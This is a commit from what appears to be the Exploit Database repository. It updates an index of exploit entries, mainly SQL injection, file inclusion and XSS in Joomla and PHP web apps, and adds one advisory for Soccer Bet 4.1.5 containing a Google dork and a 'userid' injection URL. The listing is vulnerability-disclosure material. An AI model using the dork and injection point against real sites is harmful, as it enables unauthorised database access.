DB: 2017-02-14
20 new exploits Nokia N95-8 - browser (setAttributeNode) Method Crash Nokia N95-8 browser - 'setAttributeNode' Method Crash Got All Media 7.0.0.3 - (t00t) Remote Denial of Service Got All Media 7.0.0.3 - Remote Denial of Service GeoVision Digital Video Surveillance System - (geohttpserver) DT GeoVision Digital Video Surveillance System 8.2 - Arbitrary File Disclosure pHNews alpha 1 - (templates_dir) Remote Code Execution pHNews alpha 1 - 'templates_dir' Parameter Remote Code Execution Bloggeruniverse 2.0 Beta - 'editcomments.php id' SQL Injection Den Dating 9.01 - 'searchmatch.php' SQL Injection InselPhoto 1.1 - (query) SQL Injection PHP Krazy Image Host Script 1.01 - 'viewer.php id' SQL Injection Bloggeruniverse 2.0 Beta - 'id' Parameter SQL Injection Den Dating 9.01 - 'txtlookgender' Parameter SQL Injection InselPhoto 1.1 - 'query' Parameter SQL Injection PHP Krazy Image Host Script 1.01 - 'id' Parameter SQL Injection Vlinks 1.1.6 - 'id' SQL Injection Vlinks 1.1.6 - 'id' Parameter SQL Injection CmsFaethon 2.2.0 - info.php item SQL Command Injection InselPhoto 1.1 - Persistent Cross-Site Scripting CmsFaethon 2.2.0 - 'item' Parameter SQL Injection InselPhoto 1.1 - Cross-Site Scripting SAS Hotel Management System - 'myhotel_info.asp' SQL Injection YACS CMS 8.11 - update_trailer.php Remote File Inclusion SAS Hotel Management System - 'id' Parameter SQL Injection YACS CMS 8.11 - 'update_trailer.php' Remote File Inclusion pHNews Alpha 1 - 'header.php mod' SQL Injection pHNews Alpha 1 - 'mod' Parameter SQL Injection Novaboard 1.0.1 - (message) Persistent Cross-Site Scripting Novaboard 1.0.1 - Cross-Site Scripting Joomla! Component JE Quiz - Blind SQL Injection Joomla! Component JE Quiz - 'eid' Parameter Blind SQL Injection SAS Hotel Management System - user_login.asp SQL Injection SAS Hotel Management System - 'notfound' Parameter SQL Injection JE Messenger 1.0 - Arbitrary File Upload Joomla! Component JE Messenger 1.0 - Arbitrary File Upload Joomla! Component 'com_jeauto' - Local File Inclusion Joomla! Component JE Auto - Local File Inclusion vlinks 2.0.3 - 'site.php id Parameter' SQL Injection Vlinks 2.0.3 - 'id' Parameter SQL Injection Yacs CMS 10.5.27 - 'context[path_to_root]' Parameter Remote File Inclusion YACS CMS 10.5.27 - 'context[path_to_root]' Parameter Remote File Inclusion Joomla! Component Soccer Bet 4.1.5 - 'userid' Parameter SQL Injection PHP Marketplace Script - SQL Injection Joomla! Component JE Classify Ads 1.2 - 'pro_id' Parameter SQL Injection Joomla! Component JE Gallery 1.3 - 'photo_id' Parameter SQL Injection Joomla! Component JE Directory 1.7 - 'ditemid' Parameter SQL Injection Joomla! Component JE QuoteForm - 'Itemid' Parameter SQL Injection Joomla! Component JE Property Finder 1.6.3 - SQL Injection Joomla! Component JE Tour 2.0 - SQL Injection Joomla! Component JE Video Rate 1.0 - SQL Injection Joomla! Component JE auction 1.6 - 'eid' Parameter SQL Injection Joomla! Component JE Auto 1.5 - 'd_itemid' Parameter SQL Injection Joomla! Component JE Awd Song 1.8 - SQL Injection Joomla! Component Hbooking 1.9.9 - 'h_id' Parameter SQL Injection Joomla! Component JE Quiz 2.3 - SQL Injection Joomla! Component JE Grid Folio - 'id' Parameter SQL Injection Joomla! Component JE K2 Multiple Form Story 1.3 - 'Itemid' Parameter SQL Injection Joomla! Component JE Form Creator 1.8 - 'Itemid' Parameter SQL Injection Joomla! Component JE Portfolio Creator 1.2 - 'd_itemid' Parameter SQL Injection Joomla! Component JE Ticket System 1.2 - SQL Injection Joomla! Component JE Messanger - SQL Injection
This commit is contained in:
Offensive Security
parent
8b6bfd7f93
commit
d548da5f4f
21 changed files with 431 additions and 21 deletions
62
files.csv
62
files.csv
|
|
@ -941,10 +941,10 @@ id,file,description,date,author,platform,type,port
|
|||
8013,platforms/hardware/dos/8013.txt,"Nokia N95-8 - '.jpg' Remote Crash (PoC)",2009-02-09,"Juan Yacubian",hardware,dos,0
|
||||
8021,platforms/multiple/dos/8021.pl,"Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service",2009-02-09,"Praveen Darshanam",multiple,dos,0
|
||||
8024,platforms/windows/dos/8024.py,"TightVNC - Authentication Failure Integer Overflow (PoC)",2009-02-09,desi,windows,dos,0
|
||||
8051,platforms/hardware/dos/8051.html,"Nokia N95-8 - browser (setAttributeNode) Method Crash",2009-02-13,"Juan Yacubian",hardware,dos,0
|
||||
8051,platforms/hardware/dos/8051.html,"Nokia N95-8 browser - 'setAttributeNode' Method Crash",2009-02-13,"Juan Yacubian",hardware,dos,0
|
||||
8058,platforms/windows/dos/8058.pl,"TPTEST 3.1.7 - Stack Buffer Overflow (PoC)",2009-02-16,ffwd,windows,dos,0
|
||||
8077,platforms/windows/dos/8077.html,"Microsoft Internet Explorer 7 - Memory Corruption (PoC) (MS09-002)",2009-02-18,anonymous,windows,dos,0
|
||||
8084,platforms/windows/dos/8084.pl,"Got All Media 7.0.0.3 - (t00t) Remote Denial of Service",2009-02-20,LiquidWorm,windows,dos,0
|
||||
8084,platforms/windows/dos/8084.pl,"Got All Media 7.0.0.3 - Remote Denial of Service",2009-02-20,LiquidWorm,windows,dos,0
|
||||
8090,platforms/windows/dos/8090.txt,"Multiple PDF Readers - JBIG2 Local Buffer Overflow (PoC)",2009-02-23,webDEViL,windows,dos,0
|
||||
8091,platforms/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 - (BODY onload) Remote Crash",2009-02-23,Skylined,multiple,dos,0
|
||||
8099,platforms/windows/dos/8099.pl,"Adobe Acrobat Reader - JBIG2 Local Buffer Overflow PoC (2)",2009-02-23,"Guido Landi",windows,dos,0
|
||||
|
|
@ -9923,7 +9923,7 @@ id,file,description,date,author,platform,type,port
|
|||
8022,platforms/hardware/remote/8022.txt,"3Com OfficeConnect Wireless Cable/DSL Router - Authentication Bypass",2009-02-09,ikki,hardware,remote,0
|
||||
8023,platforms/hardware/remote/8023.txt,"ZeroShell 1.0beta11 - Remote Code Execution",2009-02-09,ikki,hardware,remote,0
|
||||
8037,platforms/multiple/remote/8037.txt,"ProFTPd - 'mod_mysql' Authentication Bypass",2009-02-10,gat3way,multiple,remote,0
|
||||
8041,platforms/windows/remote/8041.txt,"GeoVision Digital Video Surveillance System - (geohttpserver) DT",2009-02-11,"Dejan Levaja",windows,remote,0
|
||||
8041,platforms/windows/remote/8041.txt,"GeoVision Digital Video Surveillance System 8.2 - Arbitrary File Disclosure",2009-02-11,"Dejan Levaja",windows,remote,0
|
||||
8059,platforms/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX (LIVEX_~1.OCX) File Corruption (PoC)",2009-02-16,Nine:Situations:Group,windows,remote,0
|
||||
8079,platforms/windows/remote/8079.html,"Microsoft Internet Explorer 7 (Windows XP SP2) - Memory Corruption (MS09-002)",2009-02-20,Abysssec,windows,remote,0
|
||||
8080,platforms/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002) (Python)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0
|
||||
|
|
@ -16638,7 +16638,7 @@ id,file,description,date,author,platform,type,port
|
|||
2295,platforms/php/webapps/2295.txt,"In-link 2.3.4 - (ADODB_DIR) Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0
|
||||
2296,platforms/asp/webapps/2296.txt,"SimpleBlog 2.3 - 'id' SQL Injection",2006-09-04,Vipsta/MurderSkillz,asp,webapps,0
|
||||
2297,platforms/php/webapps/2297.pl,"TR Forum 2.0 - SQL Injection / Bypass Security Restriction Exploit",2006-09-04,DarkFig,php,webapps,0
|
||||
2298,platforms/php/webapps/2298.php,"pHNews alpha 1 - (templates_dir) Remote Code Execution",2006-09-04,Kacper,php,webapps,0
|
||||
2298,platforms/php/webapps/2298.php,"pHNews alpha 1 - 'templates_dir' Parameter Remote Code Execution",2006-09-04,Kacper,php,webapps,0
|
||||
2299,platforms/php/webapps/2299.php,"PHP Proxima 6 - completepack Remote Code Execution",2006-09-04,Kacper,php,webapps,0
|
||||
2300,platforms/php/webapps/2300.pl,"SoftBB 0.1 - (cmd) Remote Command Execution",2006-09-04,DarkFig,php,webapps,0
|
||||
2301,platforms/php/webapps/2301.txt,"MySpeach 3.0.2 - (my_ms[root]) Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0
|
||||
|
|
@ -20729,30 +20729,30 @@ id,file,description,date,author,platform,type,port
|
|||
8039,platforms/php/webapps/8039.txt,"SkaDate Online 7 - Arbitrary File Upload",2009-02-11,ZoRLu,php,webapps,0
|
||||
8040,platforms/php/webapps/8040.txt,"Graugon Gallery 1.0 - Cross-Site Scripting / SQL Injection / Cookie Bypass",2009-02-11,x0r,php,webapps,0
|
||||
8042,platforms/php/webapps/8042.txt,"dacio's CMS 1.08 - Cross-Site Scripting / SQL Injection / File Disclosure",2009-02-11,"Mehmet Ince",php,webapps,0
|
||||
8043,platforms/php/webapps/8043.pl,"Bloggeruniverse 2.0 Beta - 'editcomments.php id' SQL Injection",2009-02-11,Osirys,php,webapps,0
|
||||
8044,platforms/php/webapps/8044.txt,"Den Dating 9.01 - 'searchmatch.php' SQL Injection",2009-02-11,nuclear,php,webapps,0
|
||||
8045,platforms/php/webapps/8045.pl,"InselPhoto 1.1 - (query) SQL Injection",2009-02-11,Osirys,php,webapps,0
|
||||
8046,platforms/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 - 'viewer.php id' SQL Injection",2009-02-12,x0r,php,webapps,0
|
||||
8043,platforms/php/webapps/8043.pl,"Bloggeruniverse 2.0 Beta - 'id' Parameter SQL Injection",2009-02-11,Osirys,php,webapps,0
|
||||
8044,platforms/php/webapps/8044.txt,"Den Dating 9.01 - 'txtlookgender' Parameter SQL Injection",2009-02-11,nuclear,php,webapps,0
|
||||
8045,platforms/php/webapps/8045.pl,"InselPhoto 1.1 - 'query' Parameter SQL Injection",2009-02-11,Osirys,php,webapps,0
|
||||
8046,platforms/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 - 'id' Parameter SQL Injection",2009-02-12,x0r,php,webapps,0
|
||||
8047,platforms/php/webapps/8047.txt,"Free Joke Script 1.0 - Authentication Bypass / SQL Injection",2009-02-12,Muhacir,php,webapps,0
|
||||
8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - Arbitrary .ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation",2009-02-12,"Aria-Security Team",asp,webapps,0
|
||||
8049,platforms/php/webapps/8049.txt,"ideacart 0.02 - Local File Inclusion / SQL Injection",2009-02-13,nuclear,php,webapps,0
|
||||
8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 - 'id' SQL Injection",2009-02-13,JIKO,php,webapps,0
|
||||
8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 - 'id' Parameter SQL Injection",2009-02-13,JIKO,php,webapps,0
|
||||
8052,platforms/php/webapps/8052.pl,"ea-gBook 0.1 - Remote Command Execution with Remote File Inclusion (c99)",2009-02-13,bd0rk,php,webapps,0
|
||||
8053,platforms/php/webapps/8053.pl,"BlogWrite 0.91 - Remote File Disclosure / SQL Injection",2009-02-13,Osirys,php,webapps,0
|
||||
8054,platforms/php/webapps/8054.pl,"CmsFaethon 2.2.0 - info.php item SQL Command Injection",2009-02-13,Osirys,php,webapps,0
|
||||
8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 - Persistent Cross-Site Scripting",2009-02-16,rAWjAW,php,webapps,0
|
||||
8054,platforms/php/webapps/8054.pl,"CmsFaethon 2.2.0 - 'item' Parameter SQL Injection",2009-02-13,Osirys,php,webapps,0
|
||||
8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 - Cross-Site Scripting",2009-02-16,rAWjAW,php,webapps,0
|
||||
8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 - 'FCKeditor' Arbitrary File Upload",2009-02-16,Sp3shial,php,webapps,0
|
||||
8061,platforms/php/webapps/8061.pl,"simplePms CMS 0.1.4 - Local File Inclusion / Remote Command Execution",2009-02-16,Osirys,php,webapps,0
|
||||
8062,platforms/php/webapps/8062.txt,"powermovielist 0.14b - SQL Injection / Cross-Site Scripting",2009-02-16,brain[pillow],php,webapps,0
|
||||
8063,platforms/php/webapps/8063.txt,"Novaboard 1.0.0 - Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0
|
||||
8064,platforms/php/webapps/8064.pl,"MemHT Portal 4.0.1 - Delete All Private Messages Exploit",2009-02-16,StAkeR,php,webapps,0
|
||||
8065,platforms/asp/webapps/8065.txt,"SAS Hotel Management System - 'myhotel_info.asp' SQL Injection",2009-02-16,Darkb0x,asp,webapps,0
|
||||
8066,platforms/php/webapps/8066.txt,"YACS CMS 8.11 - update_trailer.php Remote File Inclusion",2009-02-16,ahmadbady,php,webapps,0
|
||||
8065,platforms/asp/webapps/8065.txt,"SAS Hotel Management System - 'id' Parameter SQL Injection",2009-02-16,Darkb0x,asp,webapps,0
|
||||
8066,platforms/php/webapps/8066.txt,"YACS CMS 8.11 - 'update_trailer.php' Remote File Inclusion",2009-02-16,ahmadbady,php,webapps,0
|
||||
8068,platforms/php/webapps/8068.txt,"ravennuke 2.3.0 - Multiple Vulnerabilities",2009-02-16,waraxe,php,webapps,0
|
||||
8069,platforms/php/webapps/8069.txt,"Grestul 1.x - Authentication Bypass (Cookie SQL Injection)",2009-02-16,x0r,php,webapps,0
|
||||
8070,platforms/asp/webapps/8070.txt,"SAS Hotel Management System - Arbitrary File Upload",2009-02-17,ZoRLu,asp,webapps,0
|
||||
8071,platforms/php/webapps/8071.txt,"S-CMS 1.1 Stable - Insecure Cookie Handling / Mass Page Delete Vulnerabilities",2009-02-17,x0r,php,webapps,0
|
||||
8072,platforms/php/webapps/8072.txt,"pHNews Alpha 1 - 'header.php mod' SQL Injection",2009-02-17,x0r,php,webapps,0
|
||||
8072,platforms/php/webapps/8072.txt,"pHNews Alpha 1 - 'mod' Parameter SQL Injection",2009-02-17,x0r,php,webapps,0
|
||||
8073,platforms/php/webapps/8073.txt,"pHNews Alpha 1 - 'genbackup.php' Database Disclosure",2009-02-17,x0r,php,webapps,0
|
||||
8075,platforms/php/webapps/8075.pl,"Firepack - 'admin/ref.php' Remote Code Execution",2009-02-18,Lidloses_Auge,php,webapps,0
|
||||
8076,platforms/php/webapps/8076.txt,"smNews 1.0 - Authentication Bypass/Column Truncation Vulnerabilities",2009-02-18,x0r,php,webapps,0
|
||||
|
|
@ -20795,7 +20795,7 @@ id,file,description,date,author,platform,type,port
|
|||
8140,platforms/php/webapps/8140.txt,"Zabbix 1.6.2 Frontend - Multiple Vulnerabilities",2009-03-03,USH,php,webapps,0
|
||||
8141,platforms/php/webapps/8141.txt,"blindblog 1.3.1 - SQL Injection / Authentication Bypass / Local File Inclusion",2009-03-03,"Salvatore Fresta",php,webapps,0
|
||||
8145,platforms/php/webapps/8145.txt,"tghostscripter Amazon Shop - Cross-Site Scripting / Directory Traversal / Remote File Inclusion",2009-03-03,d3b4g,php,webapps,0
|
||||
8150,platforms/php/webapps/8150.txt,"Novaboard 1.0.1 - (message) Persistent Cross-Site Scripting",2009-03-03,Pepelux,php,webapps,0
|
||||
8150,platforms/php/webapps/8150.txt,"Novaboard 1.0.1 - Cross-Site Scripting",2009-03-03,Pepelux,php,webapps,0
|
||||
8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold - (id_news) SQL Injection",2009-03-03,kecemplungkalen,php,webapps,0
|
||||
8161,platforms/php/webapps/8161.txt,"celerbb 0.0.2 - Multiple Vulnerabilities",2009-03-05,"Salvatore Fresta",php,webapps,0
|
||||
8164,platforms/php/webapps/8164.php,"Joomla! Component com_iJoomla_archive - Blind SQL Injection",2009-03-05,Stack,php,webapps,0
|
||||
|
|
@ -22409,7 +22409,7 @@ id,file,description,date,author,platform,type,port
|
|||
11282,platforms/php/webapps/11282.txt,"Joomla! Component com_ccnewsletter - Local File Inclusion",2010-01-28,AtT4CKxT3rR0r1ST,php,webapps,0
|
||||
11284,platforms/php/webapps/11284.txt,"PHP Product Catalog - Cross-Site Request Forgery (Change Administrator Password)",2010-01-29,bi0,php,webapps,0
|
||||
11286,platforms/php/webapps/11286.txt,"Joomla! Component Jreservation - Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps,0
|
||||
11287,platforms/php/webapps/11287.txt,"Joomla! Component JE Quiz - Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps,0
|
||||
11287,platforms/php/webapps/11287.txt,"Joomla! Component JE Quiz - 'eid' Parameter Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps,0
|
||||
11289,platforms/php/webapps/11289.txt,"Joomla! Component com_dms 2.5.1 - SQL Injection",2010-01-30,kaMtiEz,php,webapps,0
|
||||
11290,platforms/php/webapps/11290.txt,"phpunity.newsmanager - Local File Inclusion",2010-01-30,kaMtiEz,php,webapps,0
|
||||
11292,platforms/php/webapps/11292.txt,"Joomla! Component JE Event Calendar - SQL Injection",2010-01-30,B-HUNT3|2,php,webapps,0
|
||||
|
|
@ -23511,7 +23511,7 @@ id,file,description,date,author,platform,type,port
|
|||
13867,platforms/php/webapps/13867.txt,"E-Book Store - SQL Injection",2010-06-14,Valentin,php,webapps,0
|
||||
13880,platforms/asp/webapps/13880.txt,"Smart ASP Survey - Cross-Site Scripting / SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
|
||||
13881,platforms/php/webapps/13881.txt,"Pre Job Board Pro - Authentication Bypass",2010-06-15,"L0rd CrusAd3r",php,webapps,0
|
||||
13882,platforms/asp/webapps/13882.txt,"SAS Hotel Management System - user_login.asp SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
|
||||
13882,platforms/asp/webapps/13882.txt,"SAS Hotel Management System - 'notfound' Parameter SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
|
||||
13883,platforms/asp/webapps/13883.txt,"Business Classified Listing - SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
|
||||
13884,platforms/asp/webapps/13884.txt,"Restaurant Listing with Online Ordering - SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
|
||||
13885,platforms/asp/webapps/13885.txt,"Acuity CMS 2.7.1 - SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
|
||||
|
|
@ -24338,7 +24338,7 @@ id,file,description,date,author,platform,type,port
|
|||
15715,platforms/php/webapps/15715.txt,"CMScout 2.09 - Cross-Site Request Forgery",2010-12-09,"High-Tech Bridge SA",php,webapps,0
|
||||
15720,platforms/php/webapps/15720.txt,"Sulata iSoft - 'stream.php' Local File Disclosure",2010-12-10,Sudden_death,php,webapps,0
|
||||
15718,platforms/php/webapps/15718.txt,"AJ Matrix DNA - SQL Injection",2010-12-09,Br0ly,php,webapps,0
|
||||
15719,platforms/php/webapps/15719.txt,"JE Messenger 1.0 - Arbitrary File Upload",2010-12-09,"Salvatore Fresta",php,webapps,0
|
||||
15719,platforms/php/webapps/15719.txt,"Joomla! Component JE Messenger 1.0 - Arbitrary File Upload",2010-12-09,"Salvatore Fresta",php,webapps,0
|
||||
15721,platforms/php/webapps/15721.txt,"Joomla! Component 'com_billyportfolio' 1.1.2 - Blind SQL Injection",2010-12-10,jdc,php,webapps,0
|
||||
15728,platforms/hardware/webapps/15728.txt,"Clear iSpot/Clearspot 2.0.0.0 - Cross-Site Request Forgery",2010-12-12,"Trustwave's SpiderLabs",hardware,webapps,0
|
||||
15735,platforms/php/webapps/15735.txt,"MantisBT 1.2.3 (db_type) - Cross-Site Scripting / Full Path Disclosure",2010-12-15,LiquidWorm,php,webapps,0
|
||||
|
|
@ -24366,7 +24366,7 @@ id,file,description,date,author,platform,type,port
|
|||
15775,platforms/php/webapps/15775.txt,"Mafia Game Script - SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0
|
||||
15776,platforms/asp/webapps/15776.pl,"Virtual Store Open 3.0 - Acess SQL Injection",2010-12-18,Br0ly,asp,webapps,0
|
||||
15777,platforms/asp/webapps/15777.txt,"Oto Galery 1.0 - Multiple SQL Injections",2010-12-19,"DeadLy DeMon",asp,webapps,0
|
||||
15779,platforms/php/webapps/15779.txt,"Joomla! Component 'com_jeauto' - Local File Inclusion",2010-12-19,Sid3^effects,php,webapps,0
|
||||
15779,platforms/php/webapps/15779.txt,"Joomla! Component JE Auto - Local File Inclusion",2010-12-19,Sid3^effects,php,webapps,0
|
||||
15781,platforms/php/webapps/15781.txt,"Inout Webmail Script - Persistent Cross-Site Scripting",2010-12-20,Sid3^effects,php,webapps,0
|
||||
15783,platforms/php/webapps/15783.txt,"MaticMarket 2.02 for PHP-Nuke - Local File Inclusion",2010-12-20,xer0x,php,webapps,0
|
||||
15784,platforms/asp/webapps/15784.txt,"Elcom CommunityManager.NET - Authentication Bypass",2010-12-20,"Sense of Security",asp,webapps,0
|
||||
|
|
@ -25744,7 +25744,7 @@ id,file,description,date,author,platform,type,port
|
|||
20855,platforms/php/webapps/20855.txt,"Wiki Web Help 0.3.9 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-27,"Shai rod",php,webapps,0
|
||||
20856,platforms/php/webapps/20856.txt,"XWiki 4.2-milestone-2 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-27,"Shai rod",php,webapps,0
|
||||
20857,platforms/php/webapps/20857.txt,"web@all CMS 2.0 - Multiple Vulnerabilities",2012-08-27,LiquidWorm,php,webapps,0
|
||||
20859,platforms/php/webapps/20859.txt,"vlinks 2.0.3 - 'site.php id Parameter' SQL Injection",2012-08-27,JIKO,php,webapps,0
|
||||
20859,platforms/php/webapps/20859.txt,"Vlinks 2.0.3 - 'id' Parameter SQL Injection",2012-08-27,JIKO,php,webapps,0
|
||||
20862,platforms/php/webapps/20862.txt,"WordPress Plugin Count Per Day 3.2.3 - Cross-Site Scripting",2012-08-27,Crim3R,php,webapps,0
|
||||
20863,platforms/php/webapps/20863.txt,"xt:Commerce VEYTON 4.0.15 - (products_name_de) Script Insertion",2012-08-27,LiquidWorm,php,webapps,0
|
||||
20864,platforms/asp/webapps/20864.txt,"Elcom CMS 7.4.10 - Community Manager Insecure Arbitrary File Upload",2012-08-27,"Sense of Security",asp,webapps,0
|
||||
|
|
@ -33470,7 +33470,7 @@ id,file,description,date,author,platform,type,port
|
|||
34344,platforms/asp/webapps/34344.txt,"Pre Jobo.NET - Multiple SQL Injections",2009-12-17,bi0,asp,webapps,0
|
||||
34345,platforms/java/webapps/34345.txt,"jCore - 'search' Parameter Cross-Site Scripting",2009-12-17,loneferret,java,webapps,0
|
||||
34347,platforms/cgi/webapps/34347.txt,"iOffice 0.1 - 'parametre' Parameter Remote Command Execution",2010-07-18,"Marshall Whittaker",cgi,webapps,0
|
||||
34349,platforms/php/webapps/34349.txt,"Yacs CMS 10.5.27 - 'context[path_to_root]' Parameter Remote File Inclusion",2010-07-18,eidelweiss,php,webapps,0
|
||||
34349,platforms/php/webapps/34349.txt,"YACS CMS 10.5.27 - 'context[path_to_root]' Parameter Remote File Inclusion",2010-07-18,eidelweiss,php,webapps,0
|
||||
34350,platforms/php/webapps/34350.txt,"Sourcefabric Campsite Articles - HTML Injection",2010-07-15,D4rk357,php,webapps,0
|
||||
34351,platforms/php/webapps/34351.html,"BOLDfx eUploader 3.1.1 - 'admin.php' Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic",php,webapps,0
|
||||
34352,platforms/php/webapps/34352.html,"BOLDfx Recipe Script 5.0 - Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic",php,webapps,0
|
||||
|
|
@ -37234,6 +37234,7 @@ id,file,description,date,author,platform,type,port
|
|||
41310,platforms/windows/webapps/41310.html,"SonicDICOM PACS 2.3.2 - Cross-Site Request Forgery (Add Admin)",2017-02-11,LiquidWorm,windows,webapps,0
|
||||
41311,platforms/windows/webapps/41311.txt,"SonicDICOM PACS 2.3.2 - Privilege Escalation",2017-02-11,LiquidWorm,windows,webapps,0
|
||||
41312,platforms/linux/webapps/41312.txt,"Kodi 17.1 - Arbitrary File Disclosure",2017-02-12,"Eric Flokstra",linux,webapps,0
|
||||
41328,platforms/php/webapps/41328.txt,"Joomla! Component Soccer Bet 4.1.5 - 'userid' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
|
||||
41313,platforms/php/webapps/41313.txt,"WhizBiz 1.9 - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
|
||||
41314,platforms/php/webapps/41314.txt,"TI Online Examination System 2.0 - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
|
||||
41315,platforms/php/webapps/41315.txt,"Viavi Real Estate - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
|
||||
|
|
@ -37247,3 +37248,22 @@ id,file,description,date,author,platform,type,port
|
|||
41325,platforms/php/webapps/41325.txt,"Joomla! Component Sponsor Wall 7.0 - 'wallid' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
|
||||
41326,platforms/php/webapps/41326.txt,"Joomla! Component Vik Booking 1.7 - SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
|
||||
41327,platforms/php/webapps/41327.txt,"Joomla! Component Soccer Bet 4.1.5 - 'cat' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
|
||||
41329,platforms/php/webapps/41329.txt,"PHP Marketplace Script - SQL Injection",2017-02-13,Th3GundY,php,webapps,0
|
||||
41330,platforms/php/webapps/41330.txt,"Joomla! Component JE Classify Ads 1.2 - 'pro_id' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41331,platforms/php/webapps/41331.txt,"Joomla! Component JE Gallery 1.3 - 'photo_id' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41332,platforms/php/webapps/41332.txt,"Joomla! Component JE Directory 1.7 - 'ditemid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41333,platforms/php/webapps/41333.txt,"Joomla! Component JE QuoteForm - 'Itemid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41334,platforms/php/webapps/41334.txt,"Joomla! Component JE Property Finder 1.6.3 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41335,platforms/php/webapps/41335.txt,"Joomla! Component JE Tour 2.0 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41336,platforms/php/webapps/41336.txt,"Joomla! Component JE Video Rate 1.0 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41337,platforms/php/webapps/41337.txt,"Joomla! Component JE auction 1.6 - 'eid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41338,platforms/php/webapps/41338.txt,"Joomla! Component JE Auto 1.5 - 'd_itemid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41339,platforms/php/webapps/41339.txt,"Joomla! Component JE Awd Song 1.8 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41340,platforms/php/webapps/41340.txt,"Joomla! Component Hbooking 1.9.9 - 'h_id' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41341,platforms/php/webapps/41341.txt,"Joomla! Component JE Quiz 2.3 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41342,platforms/php/webapps/41342.txt,"Joomla! Component JE Grid Folio - 'id' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41343,platforms/php/webapps/41343.txt,"Joomla! Component JE K2 Multiple Form Story 1.3 - 'Itemid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41344,platforms/php/webapps/41344.txt,"Joomla! Component JE Form Creator 1.8 - 'Itemid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41345,platforms/php/webapps/41345.txt,"Joomla! Component JE Portfolio Creator 1.2 - 'd_itemid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41346,platforms/php/webapps/41346.txt,"Joomla! Component JE Ticket System 1.2 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
41347,platforms/php/webapps/41347.txt,"Joomla! Component JE Messanger - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
17
platforms/php/webapps/41328.txt
Executable file
17
platforms/php/webapps/41328.txt
Executable file
|
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Soccer Bet 4.1.5 - 'userid' Parameter SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_soccerbet
|
||||
# Date: 12.02.2017
|
||||
# Vendor Homepage: http://www.jomsoccerbet.com/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/sports-a-games/tips-a-betts/soccer-bet/
|
||||
# Demo: http://demo.jomsoccerbet.com/
|
||||
# Version: 4.1.5
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_soccerbet&view=userbethistory&userid=[SQL]
|
||||
# # # # #
|
||||
60
platforms/php/webapps/41329.txt
Executable file
60
platforms/php/webapps/41329.txt
Executable file
|
|
@ -0,0 +1,60 @@
|
|||
